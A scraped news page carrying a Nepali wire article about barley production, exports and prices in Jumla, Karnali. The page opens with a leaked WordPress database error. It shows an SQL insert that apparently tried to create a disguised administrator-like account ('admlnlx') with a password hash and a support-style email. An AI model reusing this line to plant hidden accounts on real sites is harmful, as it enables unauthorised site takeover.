WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEueqYNlBdq0g69/GNQcbat4dx4ECK/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 05:15:52', '', 'admlnlx', 'admlnlx')
जुम्ला,पुस २९ –
अत्यन्तै हेलाका रुपमा हेरिने कर्णालीमा उत्पादित जौ बालीको माग पछिल्लो समयमा बढ्न थालेपछि यसको निर्यातमा वृद्धि हुन थालेको छ ।
यातायातले कर्णाली क्षेत्र नजोडिउन्जेल धान पछि बढी उत्पादन गरिने जौ बाली उपभोग पनि बढी नै गरिन्थ्यो । तर सडक खुलेसँगै यसको उत्पादनमा कमी आएको छ । यसलाई हेलाका रुपमा हेरिने गरिएको छ ।
बालीको महत्व र यसको गुण अवगुणका विषयमा सूक्ष्म जानकारी नभएकाले यसलाई हेला गरिएको जिल्ला कृषि विकास कार्यालयका कृषि प्रसार अधिकृत धनप्रसाद देवकोटा बताउनुहुन्छ । “जौ बालीमा कार्बोहाइडेड र प्रोटिनको मात्रा बढी पाइन्छ । यसबाटै लिटोपिठो, हर्लिक्स, बिस्कुटजस्ता चिज बनाइन्छ । स्वास्थ्यका लागि जौ निकै लाभदायक छ,” उहाँले भन्नुभयो ।
जौको विशेषता र यसले दिने पोषणका विषयमा अवगत नभएकाले र आयातित खाद्यान्नमा निर्भर हुन थालेपछि पछिल्ला वर्षमा यसको उत्पादनमा कमी आएको छ । आव २०६७÷६८ मा चार हजार ४०० हेक्टर जमिनमा छ हजार ६०० मेट्रिक टन जौ उत्पादन भएको थियो । आव २०७२÷७३ सम्म आइपुग्दा तीन हजार ८५० हेक्टरमा तीन हजार ४६५ मेट्रिक टन जौ उत्पादन भएको कार्यालयले जनाएको छ ।
कृषि प्राविधिक सहायक खेमराज शाही चालु आवमा अहिलेसम्ममा जुम्लाबाट २०० क्विन्टल जौ निर्यात भएको बताउनुहुन्छ । जौलाई कोदो, गहुँ र अन्य कृषिजन्य वस्तुसँग सहजै मिश्रण गरेर खान मिल्छ । जिल्लामा जौ प्रतिकिलो रु २८ मा खरिद गरी नेपालगन्ज–काठमाडौँसम्म पु¥याउँदा प्रतिकिलो रु ३६ देखि रु ३८ सम्ममा बिक्री हुन्छ । – रासस